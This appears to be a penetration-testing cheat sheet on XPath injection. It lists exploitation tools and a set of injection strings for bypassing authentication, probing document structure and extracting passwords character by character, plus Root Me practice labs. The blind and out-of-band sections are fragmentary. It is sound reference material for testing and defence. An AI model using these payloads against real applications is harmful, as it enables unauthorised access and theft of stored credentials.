XPATH Injection
XPath Injection is an attack technique used to exploit applications that construct XPath (XML Path Language) queries from user-supplied input to query or navigate XML documents.
Summary
Tools
- orf/xcat - Automate XPath injection attacks to retrieve documents
- feakk/xxxpwn - Advanced XPath Injection Tool
- aayla-secura/xxxpwn_smart - A fork of xxxpwn using predictive text
- micsoftvn/xpath-blind-explorer
- Harshal35/XmlChor - Xpath injection exploitation tool
Methodology
Similar to SQL injection, you want to terminate the query properly:
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
')] | //user/*[contains(*,'
') and contains(../password,'c
') and starts-with(../password,'c
Blind Exploitation
-
Size of a string
-
Access a character with
substring
, and verify its value thecodepoints-to-string
function
Out Of Band Exploitation
Labs
- Root Me - XPath injection - Authentication
- Root Me - XPath injection - String
- Root Me - XPath injection - Blind